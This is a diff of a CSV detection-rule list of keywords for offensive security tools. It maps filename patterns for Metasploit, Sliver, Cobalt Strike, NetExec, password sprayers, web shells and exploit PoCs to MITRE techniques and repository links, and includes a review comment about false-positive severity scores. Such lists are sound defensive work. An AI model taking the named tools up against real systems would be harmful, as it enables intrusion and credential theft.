"*/sniffer-detect.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/snmp-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" 
@@ -5383,29 +5440,31 @@ "*/snmp-win32-users.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/snmpwn.git*","offensive_tool_keyword","snmpwn","SNMPwn is an SNMPv3 user enumerator and attack tool. It is a legitimate security tool designed to be used by security professionals and penetration testers against hosts you have permission to test. It takes advantage of the fact that SNMPv3 systems will respond with Unknown user name when an SNMP user does not exist. allowing us to cycle through large lists of users to find the ones that do.","T1210 - T1212 - T1558","TA0001 - TA0002","N/A","N/A","Exploitation tools","https://github.com/hatlord/snmpwn","1","1","N/A","N/A","3","222","50","2020-08-23T10:41:38Z","2016-06-16T10:31:13Z" "*/snmpwn.rb*","offensive_tool_keyword","snmpwn","SNMPwn is an SNMPv3 user enumerator and attack tool. It is a legitimate security tool designed to be used by security professionals and penetration testers against hosts you have permission to test. It takes advantage of the fact that SNMPv3 systems will respond with Unknown user name when an SNMP user does not exist. 
allowing us to cycle through large lists of users to find the ones that do","T1210 - T1212 - T1558","TA0001 - TA0002","N/A","N/A","Exploitation tools","https://github.com/hatlord/snmpwn","1","1","N/A","N/A","3","222","50","2020-08-23T10:41:38Z","2016-06-16T10:31:13Z" -"*/SocialBox.sh*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/SocialBox-Termux","1","1","N/A","7","10","2417","268","2023-07-14T10:59:10Z","2019-03-28T18:07:05Z" -"*/SocialBox-Termux*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/SocialBox-Termux","1","1","N/A","10","10","2417","268","2023-07-14T10:59:10Z","2019-03-28T18:07:05Z" +"*/SocialBox.sh*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/SocialBox-Termux","1","1","N/A","7","10","2419","268","2023-07-14T10:59:10Z","2019-03-28T18:07:05Z" +"*/SocialBox-Termux*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/SocialBox-Termux","1","1","N/A","10","10","2419","268","2023-07-14T10:59:10Z","2019-03-28T18:07:05Z" "*/SocialPwned*","offensive_tool_keyword","SocialPwned","SocialPwned is an OSINT tool that allows to get the emails. from a target. 
published in social networks like Instagram. Linkedin and Twitter to find the possible credential leaks in PwnDB or Dehashed and obtain Google account information via GHunt.","T1596","TA0002","N/A","N/A","OSINT exploitation tools","https://github.com/MrTuxx/SocialPwned","1","1","N/A","N/A","9","800","93","2023-08-12T21:59:23Z","2020-04-07T22:25:38Z" "*/socks-auth-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/socks-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/socks-open-proxy.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/SpaceRunner.git*","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","1","N/A","7","2","185","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z" -"*/SpamChannel.git*","offensive_tool_keyword","SpamChannel","poof emails from any of the +2 Million domains using MailChannels","T1566 - T1566.001","TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/SpamChannel","1","1","N/A","8","3","256","28","2023-09-21T12:25:03Z","2022-12-20T21:31:55Z" -"*/spawn.git*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that spawns a sacrificial process. injects it with shellcode. and executes payload. Built to evade EDR/UserLand hooks by spawning sacrificial process with Arbitrary Code Guard (ACG). BlockDll. 
and PPID spoofing.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/spawn","1","1","N/A","10","10","407","71","2023-03-08T15:53:44Z","2021-07-17T16:35:59Z" +"*/SpamChannel.git*","offensive_tool_keyword","SpamChannel","poof emails from any of the +2 Million domains using MailChannels","T1566 - T1566.001","TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/SpamChannel","1","1","N/A","8","3","257","28","2023-09-21T12:25:03Z","2022-12-20T21:31:55Z" +"*/spawn.git*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that spawns a sacrificial process. injects it with shellcode. and executes payload. Built to evade EDR/UserLand hooks by spawning sacrificial process with Arbitrary Code Guard (ACG). BlockDll. 
and PPID spoofing.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/spawn","1","1","N/A","10","10","408","71","2023-03-08T15:53:44Z","2021-07-17T16:35:59Z" "*/spellbound.git*","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ","T1105 - T1132 - T1059.003 - T1043 - T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","1","N/A","10","10","37","3","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z" "*/spellgen.py *","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. 
","T1105 - T1132 - T1059.003 - T1043 - T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","0","N/A","10","10","37","3","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z" "*/spellstager.py *","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ","T1105 - T1132 - T1059.003 - T1043 - T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","0","N/A","10","10","37","3","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z" -"*/spider.yaml*","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation Tools","https://github.com/j3ssie/osmedeus","1","1","N/A","N/A","10","4712","845","2023-09-16T05:02:26Z","2018-11-10T04:17:18Z" +"*/spider.yaml*","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation Tools","https://github.com/j3ssie/osmedeus","1","1","N/A","N/A","10","4716","845","2023-09-16T05:02:26Z","2018-11-10T04:17:18Z" +"*/spider_plus.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*/SpiderFoot-*.log.cs*","offensive_tool_keyword","spiderfoot","The OSINT Platform for Security Assessments","T1595 - T1595.002 - T1596 - T1591 - T1591.002","TA0043 ","N/A","N/A","Information Gathering","https://www.spiderfoot.net/","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "*/SpiderFoot.csv*","offensive_tool_keyword","spiderfoot","The OSINT Platform for Security Assessments","T1595 - T1595.002 - T1596 - 
T1591 - T1591.002","TA0043 ","N/A","N/A","Information Gathering","https://www.spiderfoot.net/","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "*/spiderfoot.git*","offensive_tool_keyword","spiderfoot","The OSINT Platform for Security Assessments","T1595 - T1595.002 - T1596 - T1591 - T1591.002","TA0043 ","N/A","N/A","Information Gathering","https://www.spiderfoot.net/","1","1","N/A","6","10","N/A","N/A","N/A","N/A" "*/SpiderMate/Jatayu*","offensive_tool_keyword","Jatayu","Stealthy Stand Alone PHP Web Shell","T1071","TA0005","N/A","N/A","Shell spawning","https://github.com/SpiderMate/Jatayu","1","1","N/A","N/A","1","31","8","2019-09-12T17:03:13Z","2019-09-12T09:04:10Z" "*/splunk_whisperer.git*","offensive_tool_keyword","SplunkWhisperer2","Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations","T1068 - T1059.003 - T1071.001","TA0003 - TA0002 - TA0011","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cnotin/SplunkWhisperer2","1","1","N/A","9","3","239","53","2022-09-30T16:41:17Z","2019-02-24T18:05:51Z" "*/SplunkWhisperer2.git*","offensive_tool_keyword","SplunkWhisperer2","Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations","T1068 - T1059.003 - T1071.001","TA0003 - TA0002 - TA0011","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cnotin/SplunkWhisperer2","1","1","N/A","9","3","239","53","2022-09-30T16:41:17Z","2019-02-24T18:05:51Z" -"*/spoof/dns*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/spoof/mdns*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/spoof/spoof_windows.*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" +"*/spoof/dns*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/spoof/mdns*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/spoof/spoof_windows.*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" "*/SpookFlare.git*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" +"*/spooler.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*/spoolsystem/SpoolTrigger/*","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 
- T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" "*/spray/spray.py*","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","1","N/A","N/A","3","296","53","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z" "*/Spray365*","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","1","N/A","N/A","3","296","53","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z" 
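Review bot: The two added NetExec rows, `*/spider_plus.py*` and especially `*/spooler.py*`, match on a bare script filename yet carry a `metadata_severity_score` of 10 with both endpoint and proxy detection enabled. `spooler.py` is a plausible name for unrelated print or queue tooling, so any URL or command line containing it would alert at the highest severity. Either anchor each keyword to a path component specific to the NetExec repository, or keep the pattern, lower the score and record the risk in `metadata_comment`, for example `"high risks of false positives"` instead of `"N/A"`. The `*/sniff.py*` impacket row added in the preceding hunk has the same problem.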
@@ -5425,26 +5484,27 @@ "*/Spring-CVE/*","offensive_tool_keyword","POC","POC exploit for CVE-2022-22963","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/kh4sh3i/Spring-CVE","1","1","N/A","N/A","1","13","7","2022-03-31T20:58:54Z","2022-03-31T20:19:51Z" "*/SpringFramework_CVE-2022-22965_RCE*","offensive_tool_keyword","POC","SpringFramework CVE-2022-22965","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/Axx8/SpringFramework_CVE-2022-22965_RCE","1","0","N/A","N/A","1","76","17","2022-04-01T12:08:45Z","2022-04-01T04:51:44Z" "*/springshell-rce-poc*","offensive_tool_keyword","Spring4Shell","CVE-2022-22965 - CVE-2010-1622 redux","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/DDuarte/springshell-rce-poc","1","1","N/A","N/A","1","21","12","2023-04-18T14:15:42Z","2022-03-31T08:06:46Z" -"*/sql_inj.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*/sql_inj.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" "*/sqli.txt*","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","","N/A","","","" -"*/sqli/mssqli*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. 
open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/sqli/mysqli*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/sqli/postgresqli*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/sqli/sqlitei*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/sqli/utils*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/sqli_test.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/Sqlmap*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1059 - T1553 - T1574 - T1210 - T1220","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28282","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"*/sqli/mssqli*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
